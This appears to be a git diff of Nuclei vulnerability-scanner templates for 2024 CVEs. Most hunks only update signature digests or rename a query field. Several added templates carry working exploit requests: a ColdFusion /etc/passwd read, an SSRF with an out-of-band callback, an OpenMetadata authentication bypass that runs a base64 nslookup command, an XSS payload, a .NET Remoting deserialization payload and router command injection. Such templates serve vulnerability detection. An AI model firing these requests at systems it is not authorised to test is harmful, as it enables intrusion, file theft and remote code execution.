4a0a0047304502201055181c903e98898674fdb23437eb0e90871b42745b5c0d4aad9e3129dddf11022100c04264cde1575aff618e4b83359fa39d048cb64fbc9c3adbced30e325768c289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index 89b98cf57e..d6858b9ce0 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -45,4 +45,4 @@ http: - '!contains(body_1, "<h1> Interactsh Server </h1>")' - 'status_code_2 == 200' condition: and -# digest: 4a0a004730450220491492872c6924a820f6183de45c341dbc8838eec5bd79f241a7a8e007817a4d022100bcf486a787a7ac18c43f5a856e8edf8c68546b59012e7c096bbc48085b3ce175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210083066599f18b2c54a0a9076795f7d22b1ca8d8fad2c8f03a3147ec730c002e9702203386c976a8e99262651e52994ce6d95c2f342a0cc4e8518139df96275c9a03f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index 9279d4cacf..f0ddb1a479 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -45,4 +45,4 @@ http: - 'contains(header, "application/json")' - 'contains_all(body, "created_at", "video_id")' condition: and -# digest: 4b0a00483046022100fa33c5d3e6fdd93832d18b7feaeceaab7dc13294ca6117b62c0cf322a734e7d3022100bec7347a690ebaf2785ae5b325485392dbdb16005fd15b862aca9a8930646034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022070156cf1af14d1844f0ca97c8ef395673a56630b05af2016c799cacc75015e6f022100961eeec2ecda1a713e896c60ec730e503954339759b3f64aacd2702e074bd745:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1071.yaml b/http/cves/2024/CVE-2024-1071.yaml index 3bbcb6db7e..82c83ee6c6 100644 --- a/http/cves/2024/CVE-2024-1071.yaml +++ b/http/cves/2024/CVE-2024-1071.yaml @@ -61,4 +61,4 @@ http: regex: - '"nonce":"([0-9a-z]+)"' internal: true -# digest: 4b0a00483046022100cbbf2eef879ba4fd92a1ea6d44bcd473dbc968afabbde5391d5969feba1bc4c7022100eb9710892e9d92fa4d14b16004b74b743d42abe45900eeef50caf239ea91aaea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023025d307157dc2a97f59694d6703e6de5e5492820a9357d8a1a980e59010ca90220008b16687ffe30b37f8738816ab1e80fe8aacad0b5f8de07ac423c85f7146f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1208.yaml b/http/cves/2024/CVE-2024-1208.yaml index 2beec94098..ba10347dd8 100644 --- a/http/cves/2024/CVE-2024-1208.yaml +++ b/http/cves/2024/CVE-2024-1208.yaml @@ -27,7 +27,7 @@ info: product: learndash framework: wordpress publicwww-query: "/wp-content/plugins/sfwd-lms" - googledork-query: inurl:"/wp-content/plugins/sfwd-lms" + google-query: inurl:"/wp-content/plugins/sfwd-lms" tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash http: @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203916aaf1a8ee1aac0dd4cf38919e9f2e19085f8ccbbed45a47c932c1b491fb1302207bed484d250b4815723b4f03051d6f9f02504d362be0b2f60b4c99d8e8ff2ed3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008abc475f7d30df3a6b98733b219dede7a70dfd1c97e3c2928672e8574552af7f022100a8e1793227c1e4bbb6a2b10ceca86cd1c109f5bd43330f357f2a4a10c9c78184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1209.yaml b/http/cves/2024/CVE-2024-1209.yaml index 699e3a032f..dc369cfd47 100644 --- a/http/cves/2024/CVE-2024-1209.yaml +++ b/http/cves/2024/CVE-2024-1209.yaml @@ -23,7 +23,7 @@ info: product: learndash framework: wordpress publicwww-query: "/wp-content/plugins/sfwd-lms" - googledork-query: inurl:"/wp-content/plugins/sfwd-lms" + google-query: inurl:"/wp-content/plugins/sfwd-lms" tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash http: @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022033bf2ad75dd487b69924c9295b5366eb34cca9066811d2354a8a4e034a2e6089022100f1f2ee39c0db1395ace5d071d86ed18c10d824d16cc00024087e0b9bb1eb8a37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220363799e96bf26f65aefc0de03e8fa5d4be7862d3bc87f1bd33ee217855e3541202204c371666413ff5962a77c1ef4ecfc419b2a00dec6859fc524b10dab24d46bc5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1210.yaml b/http/cves/2024/CVE-2024-1210.yaml index c85375b2f7..9c975befa1 100644 --- a/http/cves/2024/CVE-2024-1210.yaml +++ b/http/cves/2024/CVE-2024-1210.yaml @@ -23,7 +23,7 @@ info: product: learndash framework: wordpress publicwww-query: "/wp-content/plugins/sfwd-lms" - googledork-query: inurl:"/wp-content/plugins/sfwd-lms" + google-query: inurl:"/wp-content/plugins/sfwd-lms" tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash http: @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022079f0e028ee4fd33b5e897e0550a707be3dbe291e8085b9d175297108e9c8858102202a9344a25a6ec5fa1fc025e439a8887f6cc9c9ac50b6c199f1fa27e4cc948855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f99f7431a131299ee2561e6fb7bcc25f330b25ad1e06dd0679ced69336dc71c022100df619ceeef6954dc1b47304d723b9bfad50e69af08876232c9ef3159f9638438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml index bd29772deb..eeec45de5e 100644 --- a/http/cves/2024/CVE-2024-1212.yaml +++ b/http/cves/2024/CVE-2024-1212.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220557f3f2f5ab7b8e23925a9acc4979743940842b4936843aaae68876e24ed24a4022100f067f077e0dae8b1aa1264efb248349fdd7e6f95341ca06cbab9c183402f4e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c9fc29ea41909ec2bef545f7a4e29b165e9e11f14bade221b2ffc058c2c9051022100e36e3225d79c6a7ba704b8766c5603e5b2822e539c707a4f2a1a17052f2dfc47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1709.yaml b/http/cves/2024/CVE-2024-1709.yaml index a3b025cc5a..8b034b70f7 100644 --- a/http/cves/2024/CVE-2024-1709.yaml +++ b/http/cves/2024/CVE-2024-1709.yaml @@ -52,4 +52,4 @@ http: part: header kval: - Server -# digest: 4a0a00473045022100a74505da69fc5fb96361adc56f169fe3a2e25cf85bc6df3b254da6430f8f723f02200dd625105f73d1d23ede46af0dbee84cce441acdb5c91079411b20c841a8bf23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df42d248b92130b0997228abe4ff00197ca95319ec494fcb457e36f99947b38b022100f14f62eb21d2dc5ebb6f7d9b2e3df0501572ace6e67a5cad42153418c3fae0b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-20767.yaml b/http/cves/2024/CVE-2024-20767.yaml new file mode 100644 index 0000000000..d57dff21dd --- /dev/null +++ b/http/cves/2024/CVE-2024-20767.yaml @@ -0,0 +1,54 @@ +id: CVE-2024-20767 + +info: + name: Adobe ColdFusion - Arbitrary File Read + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction. + reference: + - https://jeva.cc/2973.html + - https://nvd.nist.gov/vuln/detail/CVE-2024-20767 + - https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N + cvss-score: 8.2 + cve-id: CVE-2024-20767 + cwe-id: CWE-284 + epss-score: 0.00087 + epss-percentile: 0.35684 + metadata: + verified: true + max-request: 2 + shodan-query: http.component:"Adobe ColdFusion" + tags: cve,cve2024,adobe,condfusion,lfr + +http: + - raw: + - | + GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1 + Host: {{Hostname}} + + - | + GET /hax/../pms?module=logging&file_name=../../../../../../../../../../../../../../../../../../etc/passwd&number_of_lines=1000 HTTP/1.1 + Host: {{Hostname}} + uuid: {{extracted_uuid}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "contains(body_1, 'wddxPacket')" + - "contains(header_2, 'application/json')" + - "contains(body_2, '/bin/bash')" + condition: and + + extractors: + - type: regex + part: body_1 + name: extracted_uuid + group: 1 + regex: + - "<var name='uuid'><string>(.*)</string>" + internal: true +# digest: 4b0a00483046022100ae51132a490d9b1610ee3525362809c3c77ac5399cb74bd5070785b43cc2441e0221008bc1d323f198a3c3c0e615caceb32d4f55678113c27be537aeb55e5a329acb35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21644.yaml b/http/cves/2024/CVE-2024-21644.yaml index 42d6ca63da..4cb683498d 100644 --- a/http/cves/2024/CVE-2024-21644.yaml +++ b/http/cves/2024/CVE-2024-21644.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202f82c5b1b12cb269f3d3a47d9d26f6ce6eafa0f1eb25f16d53157877adacb2b2022100ba370c0614bdc4291dec0f4e73062b185e7f1b00aea72968559b75e39a239259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f302e5b4df6df2065372cf020665c535b9de6c08a15a2c78c955109b9ab285c4022100e42e3025cf3b53f97264dab0c19a74e110d62d5fdcd038986cc4c6c3408f2004:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21645.yaml b/http/cves/2024/CVE-2024-21645.yaml index 98e2f16367..78b42790ec 100644 --- a/http/cves/2024/CVE-2024-21645.yaml +++ b/http/cves/2024/CVE-2024-21645.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203cbf3ae7a02a2a68165345f0bd855eb6ab923669c8d2aa78f2922e0baee747f702201104ac76e942d9f3bff9d59b6e4227e4d59ff27e41aeca67e1138508b572d5b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021729634e85ce3cca856b22c561467945ed9ed3bf435485b3256804092dc4ae90220233d82fed78afeb8e07ab2442277d3b206acbd3f928ca900fed17ce0ba29b641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index 8b3b4aa7ae..d0ecc2eb4e 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -50,4 +50,4 @@ http: - '"result":' - '"message":' condition: and -# digest: 4a0a00473045022100dab064fbfcec3c4409bbb850f630e520716cb2d44e7c7db8e2bb15f21b469d690220189dc9cd26e19e0bb3683dd323e4f2cf63107d3e9b0385ebf054ce4b8c6823b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dfcc3f9560479437b285218b46fa79b25d6dce508f57d8d245a7722be24d64f20221009d4ce1c5c3203ebbe9527f74aaa75ad7a4d72d26f812ed7ac78a4fd9451829ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21893.yaml b/http/cves/2024/CVE-2024-21893.yaml index 9e27a3867c..5bacd3dd43 100644 --- a/http/cves/2024/CVE-2024-21893.yaml +++ b/http/cves/2024/CVE-2024-21893.yaml @@ -48,4 +48,4 @@ http: - '/dana-na/' - 'WriteCSS' condition: and -# digest: 4a0a00473045022031bba2e0349c9af3102196e00e85678ddbb51ba287e5d624558a50a3bbaa6be20221008a362ec4ef64ece7ab22636b902c72df49e1f72c519731e5c2eb22dec2db5c76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a0547b87f667aa36af039f186372735c368c54758d1da68f5b0fd18312a8c0402201944364cc59a7b39458b86b84369d97aa826d793c83d4c42fed8f694a87920be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22320.yaml b/http/cves/2024/CVE-2024-22320.yaml index 9f8485ac70..9bfaf8ff89 100644 --- a/http/cves/2024/CVE-2024-22320.yaml +++ b/http/cves/2024/CVE-2024-22320.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502210098cb051d3eaa91348194c7ecd090833e583697c9d77cd778763d770664584db60220693f3bc37f42c69a6e2c7f3c052d0af3e6f5b6dabf1c36d80c23967672fc642b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb5445a0a7a75731a60c4f541edc93846d4b21a800881005eb87588c9efe49a5022100c19eb39aff09e8bb429bb5c62816d7c8c8f6aff8bf92d80e455c4e9d0591e021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-25600.yaml b/http/cves/2024/CVE-2024-25600.yaml index 9277301ee3..e5b652c395 100644 --- a/http/cves/2024/CVE-2024-25600.yaml +++ b/http/cves/2024/CVE-2024-25600.yaml @@ -61,4 +61,4 @@ http: regex: - 'nonce":"([0-9a-z]+)' internal: true -# digest: 4a0a0047304502200825dcce3678d271573926754136ccd219fed98b4224e0d037ae0df099af337c022100ad0aff9a59a433275ece8b3ba693d51b7c10de39801f51c9256acefb4de536e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5bd80c7b1b78947e5625bc99d789dda7abab3a15d72d576e5e041a07373107702200f34940f17f5cb59266839d45826cad4832c7a1cb63955dd87d2ae154c68c50e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-25669.yaml b/http/cves/2024/CVE-2024-25669.yaml index e66204fd26..84ee144ab5 100644 --- a/http/cves/2024/CVE-2024-25669.yaml +++ b/http/cves/2024/CVE-2024-25669.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022063a4860371aa962027f08ce65caa9c6e56bed6d9fd642b4cab5858e9d2a0a587022021dcde63411dd8b8b4dd8a5dba94fb391fef32f46017894d5039290689784bb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204fd5e74ee54c20db7c3cd5d1790ab78c384eddacdb1bf6ab4888e62b47bb923202202cd297fb7131e47bfcbdfb0b0fecfb9e7389b820ed1ade4c78b2789b4750b18f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-25735.yaml b/http/cves/2024/CVE-2024-25735.yaml index 39dddacc72..198d9060bc 100644 --- a/http/cves/2024/CVE-2024-25735.yaml +++ b/http/cves/2024/CVE-2024-25735.yaml @@ -38,4 +38,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206a8dacddb441d7a1b82e425f1534b162e76d204f4ef3e0bc5e6286afbbcaf0c2022039d6fd9a23015b210888466c68571722e605c58a4158b8a2b20b27fe51005088:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207a882963d4a3f8ed561c7c8c0babf15f2b40b9dcd1aa09112156fa30a9e53b89022100a0a1e3ee792bbbe946761e559cb03fe55fb5b61de9e9eafa674e7cefeaa34a68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27198.yaml b/http/cves/2024/CVE-2024-27198.yaml index 6359103aec..fc07165948 100644 --- a/http/cves/2024/CVE-2024-27198.yaml +++ b/http/cves/2024/CVE-2024-27198.yaml @@ -40,4 +40,4 @@ http: - 'contains(header, "application/xml")' - 'contains_all(body, "buildNumber", "server version", "internalId")' condition: and -# digest: 4a0a004730450221008220f884f3a25d9224a1f905f261d60375b2994c774e67265135e42f4c0a1e64022069c708d0a8329977f44aef2800274817a07e19f0a371507c14d008c2777bc3f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202c6f5201162870b8740cba1e24a1a2c07ffbfaffd2ec2014089965be490e0160022058c8821bc89e13c81538085bf8725658320ee8ccebb2ecade3d9755cd2a79e00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27497.yaml b/http/cves/2024/CVE-2024-27497.yaml index 8839a592c9..87100f2ca9 100644 --- a/http/cves/2024/CVE-2024-27497.yaml +++ b/http/cves/2024/CVE-2024-27497.yaml @@ -37,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ae0948a799be0d46e30a5aa96ba956600dcb5d6d42ae66a4446dd357e592fa2022100ee9256543919ca7ef0d8ad1e00526fe222cf0f5fd7b7d333e00a012f911b8910:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fdcbe55df21e6971b2975945fcc562de49919dfaaf7c7781f14d6ecead7f480f022100b996af9f75123c3248770fc0331b01b1fd355ee1b1ffd2b438e9cfaa202d4786:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27564.yaml b/http/cves/2024/CVE-2024-27564.yaml new file mode 100644 index 0000000000..5c084baf08 --- /dev/null +++ b/http/cves/2024/CVE-2024-27564.yaml @@ -0,0 +1,41 @@ +id: CVE-2024-27564 + +info: + name: ChatGPT个人专用版 - Server Side Request Forgery + author: DhiyaneshDK + severity: high + description: | + A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter. + reference: + - https://github.com/dirk1983/chatgpt/issues/114 + - https://nvd.nist.gov/vuln/detail/CVE-2024-27564 + metadata: + verified: true + max-request: 1 + fofa-query: title="ChatGPT个人专用版" + tags: cve,cve2024,chatgpt,ssrf,oast,oos,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/pictureproxy.php?url=file:///etc/passwd" + - "{{BaseURL}}/pictureproxy.php?url=http://{{interactsh-url}}" + + stop-at-first-match: true + + matchers-condition: or + matchers: + - type: dsl + dsl: + - status_code == 200 + - contains(header, "image/jpeg") + - regex('root:.*:0:0:', body) + condition: and + + - type: dsl + dsl: + - contains(interactsh_protocol, "dns") + - contains(header, "image/jpeg") + - status_code == 200 + condition: and +# digest: 4a0a00473045022100b9b55cd78c5bb4e24de24aca20920e6ba2c0d52798af31282704de45a856095602206312e280926ef5b729c9178e0324d61a55b67c1ab2fb12752b2f46b3ac3dea97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27954.yaml b/http/cves/2024/CVE-2024-27954.yaml index 73b35bc18e..f789460226 100644 --- a/http/cves/2024/CVE-2024-27954.yaml +++ b/http/cves/2024/CVE-2024-27954.yaml @@ -35,4 +35,4 @@ http: - type: regex regex: - "root:.*:0:0:" -# digest: 4a0a00473045022100fe0fefeeca090cd190ad427541a138e93717d0eac2f27c00a2eec4bf5a63e30902202c2a3213ac5e28f8244ed547d1dd868bc948638e4cddaacee81de6d2f9422da1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4561d82424240be6c3dc4fc29a070e44885e39d14ffcdbddae881eeaf89d958022100cf500bf58250d2b5bf2a94220a8afcd8531d91b7d914c46d485700c5558887ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-28255.yaml b/http/cves/2024/CVE-2024-28255.yaml new file mode 100644 index 0000000000..8ce2c581ea --- /dev/null +++ b/http/cves/2024/CVE-2024-28255.yaml @@ -0,0 +1,46 @@ +id: CVE-2024-28255 + +info: + name: OpenMetadata - Authentication Bypass + author: DhiyaneshDK,iamnooob + severity: critical + description: | + OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`. + reference: + - https://github.com/open-metadata/OpenMetadata/blob/e2043a3f31312ebb42391d6c93a67584d798de52/openmetadata-service/src/main/java/org/openmetadata/service/security/JwtFilter.java#L111 + - https://github.com/open-metadata/OpenMetadata/blob/e2043a3f31312ebb42391d6c93a67584d798de52/openmetadata-service/src/main/java/org/openmetadata/service/security/JwtFilter.java#L113 + - https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84 + - https://nvd.nist.gov/vuln/detail/CVE-2024-28255 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-28255 + cwe-id: CWE-287 + epss-score: 0.00045 + epss-percentile: 0.12989 + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:733091897 + tags: cve,cve2024,openmetadata,rce,auth-bypass + +variables: + callback: "{{interactsh-url}}" + cmd: "nslookup {{callback}}" + payload: '{{base64(cmd)}}' + +http: + - raw: + - | + GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22{{payload}}%22))) HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "status_code == 400" + - "contains(interactsh_protocol, 'dns')" + - 'contains(body, "java.lang.Boolean")' + - 'contains(header, "application/json")' + condition: and +# digest: 4a0a00473045022100c0396d7d2cda35db57fec494cace654bac870c3441e8062bf8d202f35ccbf1e9022005757044cea4c00fe5c637c2d8134c5542795f4f41eeb6abd464db998a20471a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-28734.yaml b/http/cves/2024/CVE-2024-28734.yaml new file mode 100644 index 0000000000..d7cb5481c3 --- /dev/null +++ b/http/cves/2024/CVE-2024-28734.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-28734 + +info: + name: Coda v.2024Q1 - Cross-Site Scripting + author: Kazgangap + severity: medium + description: | + Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter. + reference: + - https://packetstormsecurity.com/files/177619/Financials-By-Coda-Cross-Site-Scripting.html + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28734 + - http://financials.com + - http://unit4.com + classification: + epss-score: 0.00045 + epss-percentile: 0.12994 + metadata: + max-request: 1 + tags: cve,cve2024,coda,xss + +http: + - raw: + - | + GET /coda/frameset?cols="><frame%20src="javascript:alert(document.domain)"> HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<frameset cols=""><frame src="javascript:alert(document.domain)">' + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 +# digest: 490a004630440220639152ac7101721af13e0f678be3f3ff7cf9b440afa2e13e5691cc2c62e3ccdf02207da7b95d3c2610f4b7d80e42eb444efd95d5f30f992d0335dfac80d9f72719c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-29059.yaml b/http/cves/2024/CVE-2024-29059.yaml new file mode 100644 index 0000000000..359178ba06 --- /dev/null +++ b/http/cves/2024/CVE-2024-29059.yaml @@ -0,0 +1,78 @@ +id: CVE-2024-29059 + +info: + name: .NET Framework - Leaking ObjRefs via HTTP .NET Remoting + author: iamnoooob,rootxharsh,DhiyaneshDk,pdresearch + severity: high + description: .NET Framework Information Disclosure Vulnerability + reference: + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059 + - https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/ + - https://github.com/codewhitesec/HttpRemotingObjRefLeak + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-29059 + epss-score: 0.00043 + epss-percentile: 0.07503 + cpe: cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + shodan-query: 'Server: MS .NET Remoting' + vendor: microsoft + product: .net_framework + tags: cve,cve2024,dotnet,microsoft,remoting,deserialization + +http: + - raw: + - | + GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1 + Host: {{Hostname}} + __RequestVerb: POST + Content-Type: text/xml + + - | + POST {{objref}} HTTP/1.1 + Host: {{Hostname}} + SOAPAction: "" + Content-Type: text/xml + + <SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> + <a1:TextFormattingRunProperties id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35"> + <ForegroundBrush id="ref-3"><ObjectDataProvider MethodName="AddHeader" + xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" + xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" + xmlns:System="clr-namespace:System;assembly=mscorlib" + xmlns:System.Web="clr-namespace:System.Web;assembly=System.Web"><ObjectDataProvider.ObjectInstance><ObjectDataProvider MethodName="get_Response"><ObjectDataProvider.ObjectInstance> + <ObjectDataProvider ObjectType="{x:Type System.Web:HttpContext}" MethodName="get_Current" /> + </ObjectDataProvider.ObjectInstance> + </ObjectDataProvider> + </ObjectDataProvider.ObjectInstance> + <ObjectDataProvider.MethodParameters> + <System:String>X-Vuln-Test</System:String> + <System:String>{{randstr}}</System:String> + </ObjectDataProvider.MethodParameters> + </ObjectDataProvider></ForegroundBrush> + </a1:TextFormattingRunProperties> + </SOAP-ENV:Envelope> + + extractors: + - type: regex + name: objref + part: body_1 + group: 1 + regex: + - "(/[0-9a-f_]+/[0-9A-Za-z_+]+_[0-9]+\\.rem)" + internal: true + + - type: dsl + dsl: + - x_vuln_test + + matchers: + - type: dsl + dsl: + - "contains(body_1,'ObjRef')" + - "contains(x_vuln_test,'{{randstr}}')" + condition: and +# digest: 490a00463044022075eae4fa0532f3bf10a0c94bd222dc4fd59b85ae03a5e0d02f2cd542a4069e5402206cfa5cdac2a1493b73fd82d8668018e591c958cf6d0dfd4e44786def094a509a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-29269.yaml b/http/cves/2024/CVE-2024-29269.yaml new file mode 100644 index 0000000000..50f03735cc --- /dev/null +++ b/http/cves/2024/CVE-2024-29269.yaml @@ -0,0 +1,46 @@ +id: CVE-2024-29269 + +info: + name: Telesquare TLR-2005KSH - Remote Command Execution + author: ritikchaddha + severity: critical + description: | + Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions. + reference: + - https://github.com/wutalent/CVE-2024-29269/blob/main/index.md + - https://gist.github.com/win3zz/c26047ae4b182c3619509d537b808d2b + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-29269 + metadata: + max-request: 1 + shodan-query: title:"Login to TLR-2005KSH" + tags: cve,cve2024,telesquare,tlr,rce + +http: + - raw: + - | + GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<CmdResult>' + - '</xml>' + - 'Ethernet' + - 'inet' + condition: and + + - type: word + part: header + words: + - 'text/xml' + + - type: status + status: + - 200 +# digest: 